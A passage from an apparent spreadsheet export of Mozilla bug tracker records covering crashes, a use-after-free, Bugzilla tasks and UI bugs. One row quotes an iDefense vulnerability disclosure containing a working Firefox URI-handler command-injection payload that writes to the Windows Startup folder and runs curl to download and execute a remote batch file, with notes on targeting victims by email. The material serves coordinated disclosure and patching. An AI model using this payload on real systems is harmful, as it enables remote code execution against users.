        <v>0</v>
      </c>
    </row>
    <row r="6054">
      <c r="A6054" t="n">
        <v>1176270</v>
      </c>
      <c r="B6054" t="inlineStr">
        <is>
          <t>2015-06-19 08:51:56 -0700</t>
        </is>
      </c>
      <c r="C6054" t="inlineStr">
        <is>
          <t>StyleAnimationValue::operator= uses objects after delete on self-assignment</t>
        </is>
      </c>
      <c r="D6054" t="inlineStr">
        <is>
          <t>2015-08-17 15:19:25 -0700</t>
        </is>
      </c>
      <c r="E6054" t="n">
        <v>1</v>
      </c>
      <c r="F6054" t="n">
        <v>1</v>
      </c>
      <c r="G6054" t="n">
        <v>3</v>
      </c>
      <c r="H6054" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6054" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6054" t="inlineStr">
        <is>
          <t>Layout</t>
        </is>
      </c>
      <c r="K6054" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L6054" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M6054" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N6054" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6054" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6054" t="inlineStr">
        <is>
          <t>[b2g-adv-main2.2+][post-critsmash-triage][adv-main40+][adv-esr38.2+]</t>
        </is>
      </c>
      <c r="Q6054" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6054" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6054" t="inlineStr">
        <is>
          <t>mozilla41</t>
        </is>
      </c>
      <c r="T6054" t="n">
        <v>1</v>
      </c>
      <c r="U6054" t="n">
        <v>0</v>
      </c>
      <c r="V6054" t="n">
        <v>24</v>
      </c>
      <c r="W6054" t="inlineStr">
        <is>
          <t>On self-assignment, StyleAnimationValue::operator= deletes an object, then creates a new object from the deleted object's freed memory.
3558: StyleAnimationValue&amp;
3559: StyleAnimationValue::operator=(const StyleAnimationValue&amp; aOther)
3560: {
3561:   FreeValue();
3562:   mUnit = aOther.mUnit;
3563:   switch (mUnit) {
...
3586:     case eUnit_Calc:
3587:     case eUnit_ObjectPosition:
3588:       MOZ_ASSERT(IsCSSValueUnit(mUnit),
3589:                  "This clause is for handling nsCSSValue-backed units");
3590:       MOZ_ASSERT(aOther.mValue.mCSSValue, "values may not be null");
3591:       mValue.mCSSValue = new nsCSSValue(*aOther.mValue.mCSSValue);
3592:       break;
...
3637: };
3786: void
3787: StyleAnimationValue::FreeValue()
3788: {
3789:   if (IsCSSValueUnit(mUnit)) {
3790:     delete mValue.mCSSValue;
3791:   } else if (IsCSSValueListUnit(mUnit)) {
3792:     delete mValue.mCSSValueList;
3793:   } else if (IsCSSValueSharedListValue(mUnit)) {
3794:     mValue.mCSSValueSharedList-&gt;Release();
3795:   } else if (IsCSSValuePairUnit(mUnit)) {
3796:     delete mValue.mCSSValuePair;
3797:   } else if (IsCSSValueTripletUnit(mUnit)) {
3798:     delete mValue.mCSSValueTriplet;
3799:   } else if (IsCSSRectUnit(mUnit)) {
3800:     delete mValue.mCSSRect;
3801:   } else if (IsCSSValuePairListUnit(mUnit)) {
3802:     delete mValue.mCSSValuePairList;
3803:   } else if (IsStringUnit(mUnit)) {
3804:     MOZ_ASSERT(mValue.mString, "expecting non-null string");
3805:     mValue.mString-&gt;Release();
3806:   }
3807: }
operator = mishandles all of the cases in which an object is deleted or Released by FreeValue, using the deleted/Released object *aOther.mValue.* as the source for the creation of a new object.</t>
        </is>
      </c>
      <c r="X6054" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6055">
      <c r="A6055" t="n">
        <v>110013</v>
      </c>
      <c r="B6055" t="inlineStr">
        <is>
          <t>2001-11-13 21:33:04 -0800</t>
        </is>
      </c>
      <c r="C6055" t="inlineStr">
        <is>
          <t>templatize describecomponents.cgi</t>
        </is>
      </c>
      <c r="D6055" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:27 -0800</t>
        </is>
      </c>
      <c r="E6055" t="n">
        <v>1</v>
      </c>
      <c r="F6055" t="n">
        <v>1</v>
      </c>
      <c r="G6055" t="n">
        <v>4</v>
      </c>
      <c r="H6055" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I6055" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J6055" t="inlineStr">
        <is>
          <t>Bugzilla-General</t>
        </is>
      </c>
      <c r="K6055" t="inlineStr">
        <is>
          <t>2.15</t>
        </is>
      </c>
      <c r="L6055" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6055" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6055" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6055" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6055" t="inlineStr"/>
      <c r="Q6055" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6055" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S6055" t="inlineStr">
        <is>
          <t>Bugzilla 2.16</t>
        </is>
      </c>
      <c r="T6055" t="n">
        <v>1</v>
      </c>
      <c r="U6055" t="n">
        <v>0</v>
      </c>
      <c r="V6055" t="n">
        <v>22</v>
      </c>
      <c r="W6055" t="inlineStr">
        <is>
          <t>Part of the Bugzilla templatisation effort. A template a day keeps the doctor away.
Gerv</t>
        </is>
      </c>
      <c r="X6055" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6056">
      <c r="A6056" t="n">
        <v>1572838</v>
      </c>
      <c r="B6056" t="inlineStr">
        <is>
          <t>2019-08-09 12:42:18 -0700</t>
        </is>
      </c>
      <c r="C6056" t="inlineStr">
        <is>
          <t>URI Handler Command Injection Vulnerability [iDefense V-bsk2ottbf1]</t>
        </is>
      </c>
      <c r="D6056" t="inlineStr">
        <is>
          <t>2020-06-05 00:22:17 -0700</t>
        </is>
      </c>
      <c r="E6056" t="n">
        <v>1</v>
      </c>
      <c r="F6056" t="n">
        <v>1</v>
      </c>
      <c r="G6056" t="n">
        <v>3</v>
      </c>
      <c r="H6056" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6056" t="inlineStr">
        <is>
          <t>Toolkit</t>
        </is>
      </c>
      <c r="J6056" t="inlineStr">
        <is>
          <t>Startup and Profile System</t>
        </is>
      </c>
      <c r="K6056" t="inlineStr">
        <is>
          <t>68 Branch</t>
        </is>
      </c>
      <c r="L6056" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M6056" t="inlineStr">
        <is>
          <t>Windows</t>
        </is>
      </c>
      <c r="N6056" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O6056" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6056" t="inlineStr">
        <is>
          <t>[adv-main69+][adv-esr68.1+]</t>
        </is>
      </c>
      <c r="Q6056" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6056" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6056" t="inlineStr">
        <is>
          <t>mozilla70</t>
        </is>
      </c>
      <c r="T6056" t="n">
        <v>1</v>
      </c>
      <c r="U6056" t="n">
        <v>0</v>
      </c>
      <c r="V6056" t="n">
        <v>41</v>
      </c>
      <c r="W6056" t="inlineStr">
        <is>
          <t>Created attachment 9084402
PoC html file
The following email received from vendor-disclosure@idefense.com
-------- Forwarded Message --------
Subject: 	Fwd: iDefense Vendor Notification - [V-bsk2ottbf1]
Date: 	Fri, 9 Aug 2019 17:51:29 +0000
From: 	Vendor Disclosure &lt;vendor-disclosure@idefense.com&gt;
To: 	security@mozilla.org &lt;security@mozilla.org&gt;
CC: 	Vendor Disclosure &lt;vendor-disclosure@idefense.com&gt;
Please find the attached report and PoC for this issue.
Thanks,
Rohit Mothe
iDefense Labs
-------- Forwarded Message --------
Subject: 	iDefense Vendor Notification - [V-bsk2ottbf1]
Date: 	Fri, 9 Aug 2019 17:48:58 +0000
From: 	vendor-disclosure@idefense.com &lt;vendor-disclosure@idefense.com&gt;
Reply-To: 	vendor-disclosure@idefense.com
To: 	security@mozilla.org
iDefense has identified a vulnerability. This vulnerability was submitted to iDefense through our Vulnerability Contributor Program:
https://vcp.idefense.com/
iDefense Labs has validated this vulnerability and has drafted the attached advisory.Additionally, proof-of-concept code is available on request.
IMPORTANT: Please be sure to copy at least one of the '[V-bsk2ottbf1]' number(s) from this email's subject line into the subject for any emails sent as a reply.
Omission of this information from the subject line will cause emails sent by you to be automatically deleted when processed by the iDefense email SPAM
filters.
In accordance with our vendor disclosure policy
( https://vcp.idefense.com/assets/VCP_Responsible_Disclosure_Policy_4_23_18.pdf ),
we request that you acknowledge receipt of this initial notification within five business days.Our intent is to begin the process of coordinating an appropriate public disclosure date for this issue that will provide your company with adequate time to develop a patch or workaround to mitigate this vulnerability. If you have questions regarding this issue or require further details to assist with your analysis, please do not hesitate to contact us.
It is always our goal to coordinate on the public disclosure of patches/advisories as quickly as possible after a vulnerability is discovered.If, however, a reasonable time-frame cannot be agreed upon for this issue,it will be publicly released in 60 days on 10/08/2019
iDefense is willing to work with a vendor to find a mutually agreeable release date beyond this time-frame so long as the vendor continues to make good faith
efforts to produce patches in a timely fashion and regularly informs iDefense of their progress in doing so.
Please note that if the affected product is included within other applications and/or operating systems, iDefense will not be coordinating disclosure of the vulnerability to affected third parties. We ask that you handle this coordination separately.
Regards,
iDefense Vendor Liaison
iDefense Labs
_________________________________________________________________________________
Submissions included in this notification:
V-bsk2ottbf1 : Mozilla Firefox URI Handler Command Injection Vulnerability (iDefense Zero Day)
_________________________________________________________________________________
See the attached files for details regarding the above submissions.
----
The attached text file, V-bsk2ottbf1.txt, contains:
iDefense VCP Submission V-bsk2ottbf1
08/09/2019
Mozilla Firefox URI Handler Command Injection Vulnerability (iDefense Zero Day)
Description: 
Remote exploitation of an input validation vulnerability in Mozilla Foundation's Firefox could allow an attacker to execute arbitrary code with the privileges of the current user. 
Analysis: 
An input validation vulnerability has been identified in Firefox. Specifically, the error occurs in the URI Handler component in the way it improperly sanitizes MOZ_LOG and MOZ_LOG_FILE arguments. This can lead to command injection attacks.
Credit: 
Ping Fan (Zetta) Ke of VXRL working with iDefense Labs (https://vcp.idefense.com/)
Attached PoC.zip contains notes.text and a firefox.htm PoC file. Notes.text states:
Firefox URI Handler RCE
== Update 1 ==
I have checked the payload with the recent version 68 (instead of 67 in PoC) and found that the exploit is not very stable. In many cases the user has to manually kill the Firefox process in order to write the payload into the start up folder properly. However, one can simply add the -P argument (or -profile or -migration) to force Firefox to peacefully shut down, but the tradeoff is the user will see a message box regarding import profile. Yet, the benefit of using this -P argument is even if the user is running Firefox, he or she will still get infected, which is not the case with the previous payload.
-- Steps to reproduce the payload --
To reproduce, one can simply create a .url shortcut:
```
FirefoxURL-308046B0AF4A39CB:" -P -MOZ_LOG=raw,Widget:4 -MOZ_LOG_FILE="C:/Users/IEUser/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup/&amp;cd ..&amp;cd ..&amp;cd Users&amp;cd Public&amp;curl -o z.bat poc.mm2.in&amp;z.bat
```
The additional -P argument makes the exploit more reliable, and note that one need to change `IEUser` to the victim's Windows user name. This requires addition information gathering on the user's profile. 
Alternatively, one can leverage certain Windows Apps like Microsoft Outlook as shown in the PoC video. To reproduce like in the PoC video, send the following htm file as attachment to the victim:
```
&lt;a href='FirefoxURL-308046B0AF4A39CB:" -P -MOZ_LOG=raw,Widget:4 -MOZ_LOG_FILE="C:/Users/IEUser/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup/&amp;cd ..&amp;cd ..&amp;cd Users&amp;cd Public&amp;curl -o z.bat poc.mm2.in&amp;z.bat'&gt;Import Bookmark to Firefox&lt;/a&gt; 
```
The victim will then open the htm file in preview mode, so that the payload should be shown in Outlook instead of the default browser. Then if the victim click on the link, it will trigger the exploit.
-- Technical detail --
This exploit is chaining two features, argument injection (e.g. CVE-2018-1000006) and writing executable file in start up directory (e.g. CVE-2018-20250). Interestingly, Firefox has an argument injection vulnerability in 12 years ago (CVE-2007-3670), and fixed with the additional flag -osint (e.g. in nsAppRunner.cpp). However, the recent -MOZ_LOG and -MOZ_LOG_FILE arguments do not have checking with the -osint flag (in LogCommandLineHandler.cpp), causing this vulnerability to resurrect. 
The -MOZ_LOG and -MOZ_LOG_FILE allow arbitrary log file writing in arbitrary location, but the payload has to be crafted carefully in order to have meaningful code execution. Fortunately, the `Widget` log module will record the file access activities, so one could reflectively write the payload in the file name to do arbitrary code execution. In the example payload, it uses the built-in curl to download the payload from poc.mm2.in (which is just calc), and write to the Public folder and execute it.
The major browsers have already encode the URL when executing (e.g. " becomes %22), so if one open the htm payload with Chrome or Firefox itself, it will not trigger the exploit. Yet, many Windows Apps (e.g. Microsoft Office) do not do the encoding as the custom URIs are used for IPC, so it still have a great opportunity to launch such an attack.
On the other hand, unlike CVE-2018-20250, the execution base of Firefox is not in a user folder, so using directory traversal trick to write in start up is not feasible. Using variable such as %APPDATA% is also not working unlike CVE-2018-8311. So one need to guess the Windows username. In many organizations like the universities that I have worked in, the Windows username is simply the email address name. As the payload is delivered through email, attackers could target employees in an organization if they could gather the email information.
Reference:
https://github.com/mozilla/gecko-dev/blob/9c99764b14a5e5ef806cf56f4ce276a7c9de25e0/toolkit/xre/nsAppRunner.cpp
https://github.com/mozilla/gecko-dev/blob/265e6721798a455604328ed5262f430cfcc37c2f/xpcom/base/LogCommandLineHandler.cpp</t>
        </is>
      </c>
      <c r="X6056" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6057">
      <c r="A6057" t="n">
        <v>847606</v>
      </c>
      <c r="B6057" t="inlineStr">
        <is>
          <t>2013-03-04 13:49:54 -0800</t>
        </is>
      </c>
      <c r="C6057" t="inlineStr">
        <is>
          <t>Crash with ion, setTimeout(Array.prototype.filter)</t>
        </is>
      </c>
      <c r="D6057" t="inlineStr">
        <is>
          <t>2014-11-19 20:12:02 -0800</t>
        </is>
      </c>
      <c r="E6057" t="n">
        <v>1</v>
      </c>
      <c r="F6057" t="n">
        <v>1</v>
      </c>
      <c r="G6057" t="n">
        <v>3</v>
      </c>
      <c r="H6057" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6057" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6057" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K6057" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L6057" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6057" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6057" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6057" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6057" t="inlineStr">
        <is>
          <t>[adv-main24+]</t>
        </is>
      </c>
      <c r="Q6057" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6057" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S6057" t="inlineStr">
        <is>
          <t>mozilla24</t>
        </is>
      </c>
      <c r="T6057" t="n">
        <v>1</v>
      </c>
      <c r="U6057" t="n">
        <v>0</v>
      </c>
      <c r="V6057" t="n">
        <v>10</v>
      </c>
      <c r="W6057" t="inlineStr">
        <is>
          <t>Created attachment 720874
testcase (10000 elements)
Testcase can cause:
* Assertion failure: hasfp(), at js/src/vm/Stack.h:1663
* Crash [@ js::ion::FastInvoke]
Security-sensitive because the testcase reminds me of bug 815010.</t>
        </is>
      </c>
      <c r="X6057" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6058">
      <c r="A6058" t="n">
        <v>1253099</v>
      </c>
      <c r="B6058" t="inlineStr">
        <is>
          <t>2016-03-02 16:03:20 -0800</t>
        </is>
      </c>
      <c r="C6058" t="inlineStr">
        <is>
          <t>Assertion failure: p, at js/src/vm/Shape.cpp:1568 with RegExp and GC</t>
        </is>
      </c>
      <c r="D6058" t="inlineStr">
        <is>
          <t>2016-09-22 17:19:38 -0700</t>
        </is>
      </c>
      <c r="E6058" t="n">
        <v>1</v>
      </c>
      <c r="F6058" t="n">
        <v>1</v>
      </c>
      <c r="G6058" t="n">
        <v>3</v>
      </c>
      <c r="H6058" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6058" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6058" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K6058" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L6058" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M6058" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N6058" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O6058" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6058" t="inlineStr">
        <is>
          <t>[jsbugmon:update][adv-main46+][adv-esr45.1+]</t>
        </is>
      </c>
      <c r="Q6058" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6058" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S6058" t="inlineStr">
        <is>
          <t>mozilla48</t>
        </is>
      </c>
      <c r="T6058" t="n">
        <v>1</v>
      </c>
      <c r="U6058" t="n">
        <v>0</v>
      </c>
      <c r="V6058" t="n">
        <v>34</v>
      </c>
      <c r="W6058" t="inlineStr">
        <is>
          <t>The following testcase crashes on mozilla-central revision e15383656900 (build with --enable-optimize --enable-posix-nspr-emulation --enable-valgrind --enable-gczeal --disable-tests --enable-debug, run with --fuzzing-safe --thread-count=2):
RegExp({ toString: fillHeap });
function fillHeap() {
  if (RegExp(toString))
    gc();
}
Backtrace:
Program received signal SIGSEGV, Segmentation fault.
0x0000000000b1d7c5 in js::EmptyShape::insertInitialShape (cx=cx@entry=0x7ffff6907800, shape=..., shape@entry=..., proto=proto@entry=...) at js/src/vm/Shape.cpp:1568
#0  0x0000000000b1d7c5 in js::EmptyShape::insertInitialShape (cx=cx@entry=0x7ffff6907800, shape=..., shape@entry=..., proto=proto@entry=...) at js/src/vm/Shape.cpp:1568
#1  0x0000000000af7534 in ensureInitialCustomShape&lt;js::RegExpObject&gt; (obj=..., cx=0x7ffff6907800) at js/src/vm/Shape-inl.h:130
#2  js::RegExpObject::init (this=&lt;optimized out&gt;, cx=cx@entry=0x7ffff6907800, source=..., flags=js::NoFlags) at js/src/vm/RegExpObject.cpp:289
#3  0x0000000000af7643 in js::RegExpObject::initFromAtom (cx=cx@entry=0x7ffff6907800, regexp=..., regexp@entry=..., source=..., source@entry=..., flags=&lt;optimized out&gt;) at js/src/vm/RegExpObject.cpp:182
#4  0x0000000000d2f545 in RegExpInitialize (cx=cx@entry=0x7ffff6907800, obj=..., obj@entry=..., patternValue=..., patternValue@entry=..., flagsValue=..., flagsValue@entry=..., staticsUse=staticsUse@entry=js::UseRegExpStatics) at js/src/builtin/RegExp.cpp:203
#5  0x0000000000d301aa in js::regexp_construct (cx=0x7ffff6907800, argc=&lt;optimized out&gt;, vp=&lt;optimized out&gt;) at js/src/builtin/RegExp.cpp:435
#6  0x0000000000ac0722 in js::CallJSNative (cx=0x7ffff6907800, native=0xd2f9a0 &lt;js::regexp_construct(JSContext*, unsigned int, JS::Value*)&gt;, args=...) at js/src/jscntxtinlines.h:235
[...]
#18 main (argc=&lt;optimized out&gt;, argv=&lt;optimized out&gt;, envp=&lt;optimized out&gt;) at js/src/shell/js.cpp:7244
rax	0x0	0
rbx	0x7ffff6907800	140737330051072
rcx	0x7ffff6ca588d	140737333844109
rdx	0x0	0
rsi	0x7ffff6f7a9d0	140737336814032
rdi	0x7ffff6f791c0	140737336807872
rbp	0x7fffffffc2f0	140737488339696
rsp	0x7fffffffc270	140737488339568
r8	0x7ffff7fdf7c0	140737354004416
r9	0x6372732f736a2f6c	7165916604736876396
r10	0x7fffffffc030	140737488338992
r11	0x7ffff6c27ee0	140737333329632
r12	0x7fffffffc340	140737488339776
r13	0x7ffff6907800	140737330051072
r14	0x7fffffffc360	140737488339808
r15	0x7ffff69491b0	140737330319792
rip	0xb1d7c5 &lt;js::EmptyShape::insertInitialShape(js::ExclusiveContext*, JS::Handle&lt;js::Shape*&gt;, JS::Handle&lt;JSObject*&gt;)+405&gt;
=&gt; 0xb1d7c5 &lt;js::EmptyShape::insertInitialShape(js::ExclusiveContext*, JS::Handle&lt;js::Shape*&gt;, JS::Handle&lt;JSObject*&gt;)+405&gt;:	movl   $0x620,0x0
   0xb1d7d0 &lt;js::EmptyShape::insertInitialShape(js::ExclusiveContext*, JS::Handle&lt;js::Shape*&gt;, JS::Handle&lt;JSObject*&gt;)+416&gt;:	callq  0x4a6780 &lt;abort()&gt;
This test looks fishy to me. GC is being called while the RegExp object stringifies something, might be that something is collected there while it shouldn't be. Marking s-s.</t>
        </is>
      </c>
      <c r="X6058" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6059">
      <c r="A6059" t="n">
        <v>488396</v>
      </c>
      <c r="B6059" t="inlineStr">
        <is>
          <t>2009-04-14 16:47:50 -0700</t>
        </is>
      </c>
      <c r="C6059" t="inlineStr">
        <is>
          <t>DBM needs to be FIPS certifiable.</t>
        </is>
      </c>
      <c r="D6059" t="inlineStr">
        <is>
          <t>2009-04-30 10:12:42 -0700</t>
        </is>
      </c>
      <c r="E6059" t="n">
        <v>1</v>
      </c>
      <c r="F6059" t="n">
        <v>1</v>
      </c>
      <c r="G6059" t="n">
        <v>3</v>
      </c>
      <c r="H6059" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6059" t="inlineStr">
        <is>
          <t>NSS</t>
        </is>
      </c>
      <c r="J6059" t="inlineStr">
        <is>
          <t>Libraries</t>
        </is>
      </c>
      <c r="K6059" t="inlineStr">
        <is>
          <t>3.12.4</t>
        </is>
      </c>
      <c r="L6059" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6059" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6059" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6059" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6059" t="inlineStr">
        <is>
          <t>FIPS SUN_MUST_HAVE</t>
        </is>
      </c>
      <c r="Q6059" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6059" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S6059" t="inlineStr">
        <is>
          <t>3.12.4</t>
        </is>
      </c>
      <c r="T6059" t="n">
        <v>1</v>
      </c>
      <c r="U6059" t="n">
        <v>0</v>
      </c>
      <c r="V6059" t="n">
        <v>16</v>
      </c>
      <c r="W6059" t="inlineStr">
        <is>
          <t>The shared db/dbm split was made to try to remove code from the FIPS boundary. One way of doing that is to not FIPS validate the DBM code.
This would be fine normally, as all the objects passed accross the sdb_ boundary (the interface to both sqlite and dbm) are all encrypted. The problem is DBM needs to decrypt that data and reencrypt it to preserve it's date interface. That means for dbm to be FIPS, the legacy dbm code needs to be included in the FIPS boundary.
To date we believe the only thing that needs to happen to make this work is to include a .chk file and verify the dbm .so file when in FIPS mode.
This bug is for making that change and any other change needed by the lab.
bob</t>
        </is>
      </c>
      <c r="X6059" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6060">
      <c r="A6060" t="n">
        <v>1364387</v>
      </c>
      <c r="B6060" t="inlineStr">
        <is>
          <t>2017-05-12 03:29:23 -0700</t>
        </is>
      </c>
      <c r="C6060" t="inlineStr">
        <is>
          <t>[RTL] URL bar text is faded out initially in new windows despite the text not overflowing the textbox</t>
        </is>
      </c>
      <c r="D6060" t="inlineStr">
        <is>
          <t>2017-06-16 04:42:39 -0700</t>
        </is>
      </c>
      <c r="E6060" t="n">
        <v>1</v>
      </c>
      <c r="F6060" t="n">
        <v>1</v>
      </c>
      <c r="G6060" t="n">
        <v>2</v>
      </c>
      <c r="H6060" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I6060" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J6060" t="inlineStr">
        <is>
          <t>Address Bar</t>
        </is>
      </c>
      <c r="K6060" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L6060" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6060" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6060" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O6060" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6060" t="inlineStr">
        <is>
          <t>[photon-visual][p1]</t>
        </is>
      </c>
      <c r="Q6060" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6060" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6060" t="inlineStr">
        <is>
          <t>Firefox 55</t>
        </is>
      </c>
      <c r="T6060" t="n">
        <v>1</v>
      </c>
      <c r="U6060" t="n">
        <v>0</v>
      </c>
      <c r="V6060" t="n">
        <v>6</v>
      </c>
      <c r="W6060" t="inlineStr">
        <is>
          <t>Following bug 653670, I think we shouldn't fade out the URL bar text on a New Tab.
Having the "Search or enter address" text faded out (when focused and not) probably makes no sense.
This bug may (or may not) apply also to Firefox's pages such as about:debugging, about:config etc.</t>
        </is>
      </c>
      <c r="X6060" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6061">
      <c r="A6061" t="n">
        <v>1195735</v>
      </c>
      <c r="B6061" t="inlineStr">
        <is>
          <t>2015-08-18 06:18:42 -0700</t>
        </is>
      </c>
      <c r="C6061" t="inlineStr">
        <is>
          <t>To disable JS, set { script: false } when creating the panel, but inline JS is still executing</t>
        </is>
      </c>
      <c r="D6061" t="inlineStr">
        <is>
          <t>2024-05-30 09:04:25 -0700</t>
        </is>
      </c>
      <c r="E6061" t="n">
        <v>1</v>
      </c>
      <c r="F6061" t="n">
        <v>1</v>
      </c>
      <c r="G6061" t="n">
        <v>6</v>
      </c>
      <c r="H6061" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I6061" t="inlineStr">
        <is>
          <t>Add-on SDK Graveyard</t>
        </is>
      </c>
      <c r="J6061" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K6061" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L6061" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M6061" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N6061" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6061" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6061" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main42+]</t>
        </is>
      </c>
      <c r="Q6061" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6061" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6061" t="inlineStr">
        <is>
          <t>mozilla44</t>
        </is>
      </c>
      <c r="T6061" t="n">
        <v>1</v>
      </c>
      <c r="U6061" t="n">
        <v>0</v>
      </c>
      <c r="V6061" t="n">
        <v>33</v>
      </c>
      <c r="W6061" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
Steps to reproduce:
1. Create a browser extension for Firefox.
2. Create a panel with script: false:
function createPanel () {
        var sd = require("sdk/self").data;
        myPanel = require("sdk/panel").Panel({ 
                        width: 640, 
                        height: 522, 
                        allow: { script: false },
                        contentScriptFile: [ sd.url("full.js"), sd.url("popupscript.js") ]
3. Pull an external html page into the panel and include: &lt;script&gt;alert('this shouldnt happen');&lt;/script&gt;
Issue was found on firefox 40, but I believe it exists prior.
Actual results:
Alert box with "this shouldnt happen" appears.
Expected results:
Inline script should have been ignored due to this flag:
allow: { script: false }</t>
        </is>
      </c>
      <c r="X6061" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6062">
      <c r="A6062" t="n">
        <v>134575</v>
      </c>
      <c r="B6062" t="inlineStr">
        <is>
          <t>2002-03-31 19:21:21 -0800</t>
        </is>
      </c>
      <c r="C6062" t="inlineStr">
        <is>
          <t>defparams.pl::WriteParams makes data directory world writable</t>
        </is>
      </c>
      <c r="D6062" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:29 -0800</t>
        </is>
      </c>
      <c r="E6062" t="n">
        <v>1</v>
      </c>
      <c r="F6062" t="n">
        <v>1</v>
      </c>
      <c r="G6062" t="n">
        <v>4</v>
      </c>
      <c r="H6062" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I6062" t="inlineStr">
        <is>
